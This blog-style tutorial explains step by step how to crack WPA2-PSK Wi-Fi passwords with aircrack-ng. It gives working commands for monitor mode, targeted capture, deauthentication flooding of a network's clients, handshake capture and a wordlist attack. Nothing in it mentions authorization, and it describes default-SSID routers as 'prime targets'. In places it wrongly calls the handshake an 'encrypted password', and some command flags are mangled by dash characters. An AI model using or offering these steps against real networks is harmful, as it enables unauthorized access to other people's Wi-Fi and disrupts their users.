HOW TO HACK WI-FI: CRACKING WPA2-PSK PASSWORDS USING AIRCRACK-NG

 

STEP 1: PUT WI-FI ADAPTER IN MONITOR MODE WITH AIRMON-NG

Let’s start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let’s open a terminal and type:

  • airmon-ng start wlan0

Note that airmon-ng has renamed your wlan0 adapter to mon0.

STEP 2: CAPTURE TRAFFIC WITH AIRODUMP-NG

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ngcommand.

This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let’s do this by typing:

  • airodump-ng mon0

Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

STEP 3: FOCUS AIRODUMP-NG ON ONE AP ON ONE CHANNEL

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let’s open another terminal and type:

  • airodump-ng –bssid 08:86:30:74:22:76 -c 6 –write WPAcrack mon0
  • 08:86:30:74:22:76 is the BSSID of the AP
  • -c 6 is the channel the AP is operating on
  • WPAcrack is the file you want to write to
  • mon0 is the monitoring wireless adapter*

As you can see in the screenshot above, we’re now focusing on capturing data from one AP with a ESSID of Belkin276 on channel 6. The Belkin276 is probably a default SSID, which are prime targets for wireless hacking as the users that leave the default ESSID usually don’t spend much effort securing their AP.

STEP 4: AIREPLAY-NG DEAUTH

In order to capture the encrypted password, we need to have the client authenticate against the AP. If they’re already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let’s open another terminal and type:

  • aireplay-ng –deauth 100 -a 08:86:30:74:22:76 mon0
  • 100 is the number of de-authenticate frames you want to send
  • 08:86:30:74:22:76 is the BSSID of the AP
  • mon0 is the monitoring wireless adapter

STEP 5: CAPTURE THE HANDSHAKE

In the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let’s go back to our airodump-ng terminal and check to see whether or not we’ve been successful.

Notice in the top line to the far right, airodump-ng says “WPA handshake.” This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!

STEP 6: LET’S AIRCRACK-NG THAT PASSWORD!

Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I’ll be using the default password list included with aircrack-ng on BackTrack nameddarkcOde.

We’ll now attempt to crack the password by opening another terminal and typing:

  • aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
  • /pentest/passwords/wordlist/darkc0de is the absolute path to your password file

 

One comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s